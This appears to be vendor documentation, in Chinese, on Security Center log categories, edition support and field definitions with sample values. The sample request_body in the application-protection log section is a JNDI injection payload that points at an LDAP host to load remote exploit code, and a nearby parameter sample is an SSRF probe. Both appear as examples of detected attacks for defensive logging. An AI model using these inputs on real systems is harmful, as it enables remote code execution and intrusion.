日誌類別及欄位說明 - Security Center

Security Center的日誌分析功能支援對主機活動和安全事件進行集中的儲存、查詢與分析，用於安全審計、事件溯源和威脅發現。內容包括Security Center支援的日誌類型、各版本功能差異、日誌欄位以及查詢樣本。

版本支援說明

訂用帳戶

主機日誌

日誌分類	免费版	防病毒版	高级版	企業版	旗艦版
登入流水日誌	不支援	支援	支援	支援	支援
網路連接日誌	不支援	支援	支援	支援	支援
進程開機記錄	不支援	支援	支援	支援	支援
暴力破解日誌	不支援	支援	支援	支援	支援
DNS請求日誌	不支援	支援	支援	支援	支援
用戶端事件記錄	支援	支援	支援	支援	支援
帳號快照日誌	不支援	不支援	不支援	支援	支援
網路快照日誌	不支援	不支援	不支援	支援	支援
進程快照日誌	不支援	不支援	不支援	支援	支援

安全日誌

日誌分類	免费版	防病毒版	高级版	企業版	旗艦版
安全警示日誌	支援說明僅記錄免費版支援的警示。	支援	支援	支援	支援
漏洞日誌	支援說明僅記錄免費版支援的漏洞。	支援	支援	支援	支援
網路防禦日誌	不支援	支援	支援	支援	支援
核心檔案監控事件記錄	不支援	不支援	不支援	支援	支援
雲安全態勢管理-基準檢查	不支援	不支援	支援	支援	支援

增值服務日誌

開通下列增值服務時，Security Center支援分析其產生的日誌。

惡意檔案檢測
無代理檢測
應用防護
雲安全態勢管理（基線檢查日誌、雲產品配置檢查日誌）

隨用隨付服務

若購買了主機及容器安全後付費服務，根據伺服器綁定的防護等級不同，支援的日誌類型也不一樣。

主機日誌

日誌分類	未防護	病毒防護	主機全面防護	主機及容器全面防護
登入流水日誌	不支援	支援	支援	支援
網路連接日誌	不支援	支援	支援	支援
進程開機記錄	不支援	支援	支援	支援
暴力破解日誌	不支援	支援	支援	支援
DNS請求日誌	不支援	支援	支援	支援
用戶端事件記錄	支援	支援	支援	支援
帳號快照日誌	不支援	不支援	支援	支援
網路快照日誌	不支援	不支援	支援	支援
進程快照日誌	不支援	不支援	支援	支援

安全日誌

日誌分類	未防護	病毒防護	主機全面防護	主機及容器全面防護
安全警示日誌	支援說明僅記錄未防護等級支援的警示。	支援	支援	支援
漏洞日誌	支援說明僅記錄未防護等級支援的漏洞。	支援	支援	支援
網路防禦日誌	不支援	支援	支援	支援
核心檔案監控事件記錄	不支援	不支援	支援	支援

後付費服務日誌

開通下列後付費服務時，Security Center支援分析其產生的日誌。

惡意檔案檢測
無代理檢測
應用防護
雲安全態勢管理（基線檢查日誌、雲產品配置檢查日誌）

日誌類型說明

說明

以下日誌範例和欄位說明僅為參考。具體欄位可能因產品版本更新而發生變化，請以Log Service中實際採集到的資料為準。

主機日誌

登入流水日誌
- __topic__： aegis-log-login
- 日誌內容：記錄使用者登入伺服器的事件，包括登入源IP、使用者名稱、結果等
- 功能描述：協助監控使用者的活動，及時識別和響應異常行為。
  重要
  Security Center不支援採集 Windows Server 2008 作業系統的登入流水日誌。
- 採集周期：即時採集。
網路連接日誌
- __topic__： aegis-log-network
- 日誌內容：即時記錄伺服器上的網路連接活動，包括串連五元組、關聯進程等資訊
- 功能描述：協助發現異常串連行為，識別潛在的網路攻擊，最佳化網路效能等。
  重要
  - 伺服器只收集網路連接從建立到結束過程中的部分狀態。
  - 入向流量不記錄。
- 採集周期：即時採集。
進程開機記錄
- __topic__： aegis-log-process
- 日誌內容：記錄伺服器上所有新進程的啟動事件，包含進程名、命令列參數、父進程等資訊
- 功能描述：協助瞭解系統中進程的啟動情況和配置資訊，檢測異常進程活動、惡意軟體入侵和安全威脅等問題。
- 採集周期：即時採集，進程啟動立刻上報。
暴力破解日誌
- __topic__： aegis-log-crack
- 日誌內容：記錄暴力破解行為的日誌，包括嘗試登入及破解系統、應用程式或帳號的資訊。
- 功能描述：協助識別暴力破解攻擊，檢測異常登入、弱密碼和憑證泄露問題，並為事件響應與取證分析提供支援。
- 採集周期：即時採集。
帳號快照日誌
- __topic__： aegis-snapshot-host
- 日誌內容：記錄系統或應用程式中使用者帳號詳細資料的日誌，包括帳號的基本屬性，例如使用者名稱、密碼原則、登入歷史等。
- 功能描述：通過對比不同時間點的快照，監測帳號變更，及時發現未授權訪問、帳號狀態異常等安全問題。
- 採集周期：按照資產指紋設定的周期自動採集，若未設定，則每日採集一次。同時支援手動採集。
網路快照日誌
- __topic__： aegis-snapshot-port
- 日誌內容：記錄網路連接資訊，包括串連五元組、串連狀態及關聯進程等。
- 功能描述：協助瞭解系統當前活動的網路連接，發現異常串連行為，識別潛在網路攻擊。
- 採集周期：按照資產指紋設定的周期自動採集，若未設定，則每日採集一次。同時支援手動採集。
進程快照日誌
- __topic__： aegis-snapshot-process
- 日誌內容：記錄系統中的進程活動，包括進程ID、名稱、啟動時間等。
- 功能描述：用於瞭解進程活動與資源佔用情況，檢測異常進程、CPU佔用過高及記憶體泄露等問題。
- 採集周期：按照資產指紋設定的周期自動採集，若未設定，則每日採集一次。同時支援手動採集。
DNS請求日誌
- __topic__： aegis-log-dns-query
- 日誌內容：記錄伺服器發起的DNS查詢請求，包含查詢網域名稱、類型和來源等資訊。
  重要
  核心版本低於4.X.X的Linux伺服器不支援此日誌採集。
- 功能描述：用於分析DNS活動，檢測異常查詢、網域名稱劫持和DNS汙染等問題。
- 採集周期：即時採集。
用戶端事件記錄
- __topic__： aegis-log-client
- 日誌內容：記錄Security Center用戶端的上線和離線事件。
- 功能描述：協助監控安全用戶端的運行狀態。
- 採集周期：即時採集。

安全日誌

重要

安全日誌採集周期均為即時採集。

漏洞日誌
- __topic__：sas-vul-log
- 日誌內容：記錄系統或應用中發現的漏洞資訊，包含漏洞名稱、狀態、處理動作等。
- 功能描述：用於瞭解系統存在的漏洞情況、安全風險和攻擊趨勢，以便及時採取補救措施。
雲安全態勢管理-基準檢查日誌
- __topic__：sas-hc-log
- 日誌內容：記錄基準風險檢查結果，包含基準等級、類別、風險等級等資訊。
  重要
  僅記錄首次出現且未通過的檢查項資料，以及歷史檢測中已通過但重新檢測後未通過的檢查項資料。
- 功能描述：用於瞭解系統的基準安全狀態和潛在風險。
安全警示日誌
- __topic__：sas-security-log
- 日誌內容：記錄系統或應用中發生的安全事件與警示，包含警示資料來源、詳情、等級等。
- 功能描述：用於瞭解系統中的安全事件與威脅情況，以便及時採取響應措施。
雲安全態勢管理-雲平台配置檢查日誌
- __topic__：sas-cspm-log
- 日誌內容：記錄雲平台配置檢查結果、加白操作等資訊。
- 功能描述：用於瞭解雲平台存在的配置問題和潛在的安全風險。
網路防禦日誌
- __topic__：sas-net-block
- 日誌內容：記錄網路攻擊事件，包含攻擊類型、源/目標IP地址等關鍵資訊。
- 功能描述：用於瞭解網路中發生的安全事件，以採取響應和防禦措施，提升網路安全。
應用防護日誌
- __topic__：sas-rasp-log
- 日誌內容：記錄應用防護（RASP）的攻擊警示資訊，包含攻擊類型、行為資料、攻擊者IP等。
- 功能描述：用於瞭解應用程式發生的安全事件，以採取響應和防禦措施，提升應用安全。
惡意檔案檢測日誌
- __topic__：sas-filedetect-log
- 日誌內容：記錄惡意檔案檢測SDK的檢測結果，包含檔案資訊、檢測情境、結果等。
- 功能描述：用於識別離線檔案或雲端儲存中的惡意程式，以便及時處理。
核心檔案監控事件記錄
- __topic__：aegis-file-protect-log
- 日誌內容：記錄核心檔案監控檢測到的警示事件，包含檔案路徑、操作類型、警示等級等。
- 功能描述：用於監控核心檔案是否被盜取或篡改。
無代理檢測日誌
- __topic__：sas-agentless-log
- 日誌內容：記錄在雲端服務器、雲端硬碟快照、鏡像中檢測到的安全風險，包括漏洞、基準、惡意樣本、敏感檔案。
- 功能描述：用於查看資產在不同時間段的安全風險狀況，以便識別和應對潛在威脅。

主機日誌欄位說明

登入流水日誌

欄位名	說明	樣本
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
host_ip	伺服器的IP地址。	192.168.XX.XX
sas_group_name	伺服器在Security Center的資產分組。	default
uuid	伺服器的UUID。	5d83b26b-b7ca-4a0a-9267-12****
src_ip	登入伺服器的IP地址。	221.11.XX.XX
dst_port	登入伺服器的連接埠。	22
login_type	登入類型。取值包括但不限於： SSHLOGIN、SSH：SSH登入。 RDPLOGIN：遠端桌面登入。 IPCLOGIN：IPC串連登入。	SSH
username	登入使用者名稱。	admin
login_count	登入次數。 1分鐘內重複登入會被合并為1條日誌，例如`login_count`值為3，表示在最近1分鐘內重複登入了3次。	3
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

網路連接日誌

欄位名	說明	樣本
cmd_chain	進程鏈。	[ { "9883":"bash -c kill -0 -- -'6274'" } ...... ]
cmd_chain_index	進程鏈索引，可以通過相同索引尋找進程鏈。	B184
container_hostname	容器內伺服器名稱。	nginx-ingress-controller-765f67fd4d-****
container_id	容器ID。	4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****
container_image_id	鏡像ID。	registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****
container_image_name	鏡像名稱。	registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****
container_name	容器名稱。	nginx-ingress-****
container_pid	容器內進程ID。	0
net_connect_dir	網路連接方向。取值： in：入方向。 out：出方向。	in
dst_ip	網路連接接收者的IP。 dir為out時，表示對端主機。 dir為in時，表示本機。	192.168.XX.XX
dst_port	網路連接接收者的連接埠。	443
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
host_ip	伺服器IP地址。	192.168.XX.XX
parent_proc_name	父進程的檔案名稱。	/usr/bin/bash
pid	進程ID。	14275
ppid	父進程ID。	14268
proc_name	進程名。	nginx
proc_path	進程路徑。	/usr/local/nginx/sbin/nginx
proc_start_time	進程的啟動時間。	N/A
connection_type	協議。取值： tcp。 raw（表示raw socket）。	tcp
sas_group_name	伺服器在Security Center的資產分組。	default
src_ip	源IP地址。	100.127.XX.XX
src_port	源連接埠。	41897
srv_comm	父進程的父進程關聯的命令名。	containerd-shim
status	網路連接狀態。取值： 1：串連已關閉（closed）。 2：正在等待串連請求（listen）。 3：已發送SYN請求（syn send）。 4：已接收SYN請求（syn recv）。 5：串連已建立（established）。 6：等待關閉串連（close wait）。 7：正在關閉串連（closing）。 8：等待對方發送關閉請求（fin_wait1）。 9：等待對方發送關閉請求並確認（fin_wait2）。 10：等待足夠的時間以確保對方收到關閉請求的確認（time_wait）。 11：已刪除傳輸控制塊（delete_tcb）。	5
type	即時網路連接的類型。取值： connect：主動發起TCP connect串連。 accept：收到TCP串連。 listen：連接埠監聽。	listen
uid	進程使用者的ID。	101
username	進程的使用者名稱。	root
uuid	伺服器的UUID。	5d83b26b-b7ca-4a0a-9267-12****
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

進程開機記錄

欄位名	說明	樣本
cmd_chain	進程鏈。	[ { "9883":"bash -c kill -0 -- -'6274'" } ...... ]
cmd_chain_index	進程鏈索引，可以通過相同索引尋找進程鏈。	B184
cmd_index	命令列每個參數的索引，每兩個為一組，標識一個參數的起止索引。	0,3,5,8
cmdline	進程啟動的完整命令列。	ipset list KUBE-6-CLUSTER-IP
comm	進程關聯的命令名。	N/A
container_hostname	容器內伺服器名稱。	nginx-ingress-controller-765f67fd4d-****
container_id	容器ID。	4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****
container_image_id	鏡像ID。	registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****
container_image_name	鏡像名稱。	registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****
container_name	容器名稱。	nginx-ingress-****
container_pid	容器內進程ID。	0
cwd	進程運行目錄。	N/A
proc_name	進程檔案名稱。	ipset
proc_path	進程檔案完整路徑。	/usr/sbin/ipset
gid	進程組的ID。	0
groupname	使用者組。	group1
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
host_ip	伺服器IP地址。	192.168.XX.XX
parent_cmd_line	父進程的命令列。	/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX
parent_proc_name	父進程檔案名稱。	kube-proxy
parent_proc_path	父進程檔案完整路徑。	/usr/local/bin/kube-proxy
pid	進程ID。	14275
ppid	父進程ID。	14268
proc_start_time	進程啟動時間。	2024-08-01 16:45:40
parent_proc_start_time	父進程的啟動時間。	2024-07-12 19:45:19
sas_group_name	伺服器在Security Center的資產分組。	default
srv_cmd	祖進程的命令列。	/usr/bin/containerd
tty	登入的終端。N/A表示帳號從未登入過終端。	N/A
uid	使用者ID。	123
username	進程的使用者名稱。	root
uuid	伺服器的UUID。	5d83b26b-b7ca-4a0a-9267-12****
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

暴力破解日誌

欄位名	說明	樣本
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
host_ip	被暴力破解的伺服器IP地址。	192.168.XX.XX
sas_group_name	伺服器在Security Center的資產分組。	default
uuid	被暴力破解的伺服器UUID。	5d83b26b-b7ca-4a0a-9267-12*****
login_count	失敗登入次數。 1分鐘內重複登入會被合并為1條日誌，例如`warn_count`值為3，表示在最近1分鐘內重複登入了3次。	3
src_ip	登入來源IP地址。	47.92.XX.XX
dst_port	登入連接埠。	22
login_type	登入類型。取值： SSHLOGIN、SSH：SSH登入。 RDPLOGIN：遠端桌面登入。 IPCLOGIN：IPC串連登入。 SQLSERVER：sqlserver登入失敗。	SSH
username	登入使用者名稱。	user
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

帳號快照日誌

欄位名	說明	樣本
account_expire	帳號的到期時間。never表示永不到期。	never
domain	帳號所在的域或目錄服務。N/A表示不屬於任何域。	N/A
groups	帳號所在的分組。N/A表示不屬於任何組。	["nscd"]
home_dir	主目錄，系統中儲存和管理檔案的預設位置。	/Users/abc
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
host_ip	伺服器IP地址。	192.168.XX.XX
last_chg	最後一次修改密碼的日期。	2022-11-29
last_logon	最後一次登入帳號的日期和時間。N/A表示從未登入過。	2023-08-18 09:21:21
login_ip	最後一次登入帳號的遠程IP地址。N/A表示從未登入過。	192.168.XX.XX
passwd_expire	密碼的到期日期。never表示永不到期。	2024-08-24
perm	是否擁有root許可權。取值： 0：沒有root許可權。 1：有root許可權。	0
sas_group_name	伺服器在Security Center的資產分組。	default
shell	Linux的Shell命令。	/sbin/nologin
status	使用者帳號的狀態，取值： 0：帳號已被禁止登入。 1：帳號可以正常登入。	0
tty	登入的終端。N/A表示帳號從未登入過終端。	N/A
username	使用者名稱稱。	nscd
uuid	伺服器的UUID。	5d83b26b-b7ca-4a0a-9267-12****
warn_time	密碼到期提醒日期。never表示永不提醒。	2024-08-20
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

網路快照日誌

欄位名	說明	樣本
net_connect_dir	網路連接方向。取值： in：入方向。 out：出方向。	in
dst_ip	網路連接接收者的IP。 dir為out時，表示對端主機。 dir為in時，表示本機。	192.168.XX.XX
dst_port	網路連接接收者的連接埠。	443
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
host_ip	伺服器IP地址。	192.168.XX.XX
pid	進程ID。	682
proc_name	進程名。	sshd
connection_type	協議。取值： tcp4：用IPv4協議的TCP串連。 tcp6：用IPv6協議的TCP串連。	tcp4
sas_group_name	伺服器在Security Center的資產分組。	default
src_ip	源IP地址。	100.127.XX.XX
src_port	源連接埠。	41897
status	網路連接狀態。取值： 1：串連已關閉（closed）。 2：正在等待串連請求（listen）。 3：已發送SYN請求（syn send）。 4：已接收SYN請求（syn recv）。 5：串連已建立（established）。 6：等待關閉串連（close wait）。 7：正在關閉串連（closing）。 8：等待對方發送關閉請求（fin_wait1）。 9：等待對方發送關閉請求並確認（fin_wait2）。 10：等待足夠的時間以確保對方收到關閉請求的確認（time_wait）。 11：已刪除傳輸控制塊（delete_tcb）。	5
uuid	伺服器的UUID。	5d83b26b-b7ca-4a0a-9267-12****
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

進程快照日誌

欄位名	說明	樣本
cmdline	進程啟動的完整命令列。	/usr/local/share/assist-daemon/assist_daemon
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
host_ip	伺服器IP地址。	192.168.XX.XX
md5	二進位檔案的MD5雜湊值。說明超過1 MB的進程檔案不進行MD5計算。	1086e731640751c9802c19a7f53a64f5
proc_name	進程檔案名稱。	assist_daemon
proc_path	進程檔案完整路徑。	/usr/local/share/assist-daemon/assist_daemon
pid	進程ID。	1692
pname	父進程檔案名稱。	systemd
sas_group_name	伺服器在Security Center的資產分組。	default
proc_start_time	進程啟動時間。內建欄位。	2023-08-18 20:00:12
uid	進程使用者的ID。	101
username	進程的使用者名稱。	root
uuid	伺服器的UUID。	5d83b26b-b7ca-4a0a-9267-12****
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

DNS請求日誌

欄位名	說明	樣本
domain	DNS請求對應的網域名稱。	example.aliyundoc.com
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
host_ip	發起DNS請求的伺服器IP地址。	192.168.XX.XX
pid	發起DNS請求的進程ID。	3544
ppid	發起DNS請求的父進程ID。	3408
cmd_chain	發起DNS請求的進程鏈。	"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""
cmdline	發起DNS請求的命令列。	C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe
proc_path	發起DNS請求的進程路徑。	C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe
sas_group_name	伺服器在Security Center的資產分組。	default
time	捕獲DNS請求事件的時間，該時間一般和DNS請求發生時間相同。	2023-08-17 20:05:04
uuid	發起DNS請求的伺服器UUID。	5d83b26b-b7ca-4a0a-9267-12****
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

用戶端事件記錄

欄位名	說明	樣本
uuid	伺服器的UUID。	5d83b26b-b7ca-4a0a-9267-12****
host_ip	伺服器IP地址。	192.168.XX.XX
agent_version	用戶端版本。	aegis_11_91
last_login	上次登入的時間戳記。單位：毫秒。	1716444387617
platform	作業系統類型。取值： windows linux	linux
region_id	伺服器所在地區ID。	cn-beijing
status	用戶端狀態。取值： online offline	online
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

安全日誌欄位說明

漏洞日誌

欄位名	說明	樣本
vul_alias_name	漏洞別名。	CESA-2023:1335: openssl Security Update
risk_level	風險等級。取值： asap：高 later：中 nntf：低	later
extend_content	漏洞擴充資訊。	{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
internet_ip	資產的公網IP。	39.104.XX.XX
intranet_ip	資產的私網IP。	192.168.XX.XX
instance_name	主機名稱。	hhht-linux-***
vul_name	漏洞名稱。	centos:7:cesa-2023:1335
operation	漏洞的處理動作。取值： new：新增。 verify：驗證。 fix：修複。	new
status	狀態資訊。取值： 1：未修複。 2：修複失敗。 3：復原失敗。 4：修複中。 5：復原中。 6：驗證中。 7：修複成功。 8：修複成功，待重啟。 9：復原成功。 10：忽略。 11：復原成功，待重啟。 12：已不存在。 13：已失效。	1
tag	漏洞的標籤。取值： oval：Linux軟體漏洞。 system：Windows系統漏洞。 cms：Web-CMS漏洞。說明其他類型的漏洞的標籤為隨機字串。	oval
type	漏洞類型。取值： sys：Windows系統漏洞。 cve：Linux軟體漏洞。 cms：Web-CMS漏洞。 emg：緊急漏洞。	sys
uuid	伺服器UUID。	ad66133a-dc82-4e5e-9659-a49e3****
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

雲安全態勢管理-基準檢查日誌

欄位名	說明	樣本
check_item_name	檢查項名稱。	設定密碼修改最小間隔時間
check_item_level	基準的檢查等級。取值： high：高危。 medium：中危。 low：低危。	medium
check_type	檢查項類型。	身份鑒別
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
risk_level	風險項層級。取值： high：高。 medium：中。 low：低。	medium
operation	操作資訊。取值： new：新增。 verity：驗證。	new
risk_name	風險項名稱。	密碼原則合規檢測
sas_group_name	檢測出當前風險項的伺服器在Security Center的資產分組。	default
status	狀態資訊。取值： 1：未通過。 2：驗證中。 6：已經忽略。 7：修複中	1
sub_type_alias_name	子類型別名（中文）。	國際通用安全最佳實務-Ubuntu 16/18/20/22安全基準檢查
sub_type_name	基準子類型名稱。基準子類型取值請參見基準類型及子類型列表。	hc_ubuntu16_cis_rules
type_alias_name	類型別名（中文）。	國際通用安全最佳實務
type_name	基準類型。基準類型取值請參見基準類型及子類型列表。	cis
uuid	檢測出當前風險項的伺服器UUID。	1ad66133a-dc82-4e5e-9659-a49e3****
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

安全警示日誌

欄位名	說明	樣本
data_source	資料來源。取值： aegis_suspicious_event：主機異常。 aegis_suspicious_file_v2：Webshell。 aegis_login_log：異常登入。 honeypot：雲蜜罐警示事件。 object_scan：檔案檢測例外狀況事件。 security_event：Security Center例外狀況事件。 sas_ak_leak：AK泄露事件。	aegis_login_log
detail	一個結構化對象（JSON），用於提供告的詳細上下文資訊。其內部欄位會根據警示類型的不同而變化。以下是 `detail` 對象內常見欄位 `alert_reason` （異常原因）說明： reason1：IP不屬於常用訪問地點。 reason2：API調用失敗。 reason3：IP不屬於常用訪問地點且API調用失敗。	{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"西安市","type":"login_common_account","displayEventName":"ECS非常用帳號登入","status":0}
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
internet_ip	資產的公網IP。	39.104.XX.XX
intranet_ip	資產的私網IP。	192.168.XX.XX
level	警示事件的危險等級。取值： serious：緊急。 suspicious：可疑。 remind：提醒。	suspicious
name	警示名稱。	異常登入-ECS非常用帳號登入
operation	操作資訊。取值： new：新增。 dealing：處理。 update：更新。	new
status	警示的狀態。取值： 1：待處理，新產生的警示為該狀態。 2：已忽略，在控制台執行忽略操作後的警示狀態。 8：已加入白名單，在控制台執行加白名單後的警示狀態。 16：處理中，在控制台執行結束進程、隔離檔案或者加白名單等處理過程產生的狀態。 32：處理完成，在控制台執行我已手工處理，或執行結束進程、隔離檔案等操作處理完成後的狀態。 64：已經到期，30天內警示未做任何處理就會置為到期狀態。 513：自動攔截，該警示已被Security Center精準防禦功能自動攔截，無需您手動處理。	1
unique_info	警示的唯一標識。	2536dd765f804916a1fa3b9516b5****
uuid	產生警示的伺服器UUID。	ad66133a-dc82-4e5e-9659-a49e3****
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214
suspicious_event_id	警示事件ID。	650226318
handle_time	operation對應的時間。	1765272845
alert_first_time	警示首次出現時間。	1764226915
alert_last_time	警示最後一次出現時間。	1765273425
strict_type	警示是否是strict 模式的警示。取值範圍：true/false。
user_id	賬戶ID。	1358******3357

雲安全態勢管理-雲平台配置檢查日誌

欄位名	說明	樣本
check_id	檢查項ID。可通過調用ListCheckResult - 查看雲產品中雲平台配置檢查風險項結果詳情介面擷取ID值。	11
check_item_name	檢查項名稱。	回源配置
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
instance_name	執行個體名稱。	lsm
instance_result	風險產生的影響。格式為JSON字串。	{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]}
instance_sub_type	執行個體的子類型。取值：當執行個體類型為ECS時，子類型的取值： INSTANCE。 DISK。 SECURITY_GROUP。當執行個體類型為ACR時，子類型的取值： REPOSITORY_ENTERPRISE。 REPOSITORY_PERSON。當執行個體類型為RAM時，子類型的取值： ALIAS。 USER。 POLICY。 GROUP。當執行個體類型為WAF時，子類型的取值為DOMAIN。當執行個體類型為其他值時，子類型的取值為INSTANCE。	INSTANCE
instance_type	執行個體類型。取值： ECS：雲端服務器。 SLB：負載平衡。 RDS：RDS資料庫。 MONGODB：MongoDB資料庫。 KVSTORE：Redis資料庫。 ACR：Container Registry。 CSK：CSK。 VPC：專用網路。 ACTIONTRAIL：Action Trail。 CDN：內容分發網路。 CAS：數位憑證管理服務（原SSL認證）。 RDC：雲效。 RAM：存取控制。 DDOS：DDoS防護。 WAF：Web Application Firewall。 OSS：Object Storage Service。 POLARDB：PolarDB資料庫。 POSTGRESQL：PostgreSQL資料庫。 MSE：微服務引擎。 NAS：檔案儲存體。 SDDP：Sensitive Data Discovery and Protection。 EIP：Elastic IP Address。	ECS
region_id	執行個體所在地區ID。	cn-hangzhou
requirement_id	條例ID。您可以通過ListCheckStandard - 雲平台配置檢查擷取標準列表介面擷取該ID。	5
risk_level	風險層級。取值： LOW。 MEDIUM。 HIGH。	MEDIUM
section_id	章節ID。您可以通過ListCheckResult - 查看雲產品中雲平台配置檢查風險項結果詳情介面擷取ID值。	1
standard_id	標準ID。您可以通過ListCheckStandard - 雲平台配置檢查擷取標準列表介面擷取該ID。	1
status	檢查項的狀態。取值： NOT_CHECK：未檢查。 CHECKING：檢查中。 PASS：檢查通過。 NOT_PASS：檢查未通過。 WHITELIST：已加入白名單。	PASS
vendor	所屬雲廠商。固定取值：ALIYUN。	ALIYUN
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

網路防禦日誌

欄位名	說明	樣本
cmd	被攻擊的進程命令列。	nginx: master process nginx
cur_time	攻擊事件的發生時間。	2023-09-14 09:21:59
decode_payload	HEX格式轉換為字元的payload。	POST /Services/FileService/UserFiles/
dst_ip	被攻擊資產的IP地址。	172.16.XX.XX
dst_port	被攻擊資產的連接埠。	80
func	攔截事件的類型。取值： payload：惡意負載類型，表示由於檢測到惡意資料或指令而觸發的攻擊事件攔截。 tuple：惡意IP類型，表示由於檢測到惡意IP訪問而觸發的攻擊事件攔截。	payload
rule_type	攔截事件的具體規則類型。取值： alinet_payload：Security Center指定的payload事件防禦規則。 alinet_tuple：Security Center指定的tuple事件防禦規則。	alinet_payload
instance_id	被攻擊資產的執行個體ID。	i-2zeg4zldn8zypsfg****
internet_ip	被攻擊資產的公網IP。	39.104.XX.XX
intranet_ip	被攻擊資產的私網IP。	192.168.XX.XX
final_action	防禦動作模式。取值：block（已攔截）。	block
payload	HEX格式的payload。	504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****
pid	被攻擊的進程ID。	7107
platform	被攻擊資產的系統類別型。取值： windows linux	linux
proc_path	被攻擊的進程路徑。	/usr/sbin/nginx
sas_group_name	伺服器在Security Center的資產分組。	default
src_ip	發起攻擊的源IP地址。	106.11.XX.XX
src_port	發起攻擊的源連接埠。	29575
uuid	伺服器的UUID。	5d83b26b-b7ca-4a0a-9267-12****
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

應用防護日誌

欄位名	說明	樣本
app_dir	應用所在目錄。	/usr/local/aegis/rasp/apps/1111
app_id	應用ID。	6492a391fc9b4e2aad94****
app_name	應用程式名稱。	test
confidence_level	檢測演算法的信賴度。取值： high。 medium。 low。	low
request_body	請求體資訊。	{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}
request_content_length	請求體長度。	112
data	hook點參數。	{"cmd":"bash -c kill -0 -- -'31098' "}
headers	要求標頭資訊。	{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, /"}
hostname	主機或網路裝置的名稱。	testhostname
host_ip	主機私網IP地址。	172.16.XX.XX
is_cliped	該條日誌是否因為超長被裁剪過。取值： true：已裁剪 false：未裁剪	false
jdk_version	JDK版本。	1.8.0_292
message	警示描述資訊。	Unsafe class serial.
request_method	要求方法。	Post
platform	作業系統類型。	Linux
arch	作業系統架構。	amd64
kernel_version	作業系統核心版本。	3.10.0-1160.59.1.el7.x86_64
param	請求參數，常見格式包括： GET參數。 application/x-www-form-urlencoded。	{"url":["http://127.0.0.1.xip.io"]}
payload	有效攻擊載荷。	bash -c kill -0 -- -'31098'
payload_length	有效攻擊載荷長度。	27
rasp_id	應用防護探針唯一ID。	fa00223c8420e256c0c98ca0bd0d****
rasp_version	應用防護探針版本。	0.8.5
src_ip	要求者IP地址。	172.0.XX.XX
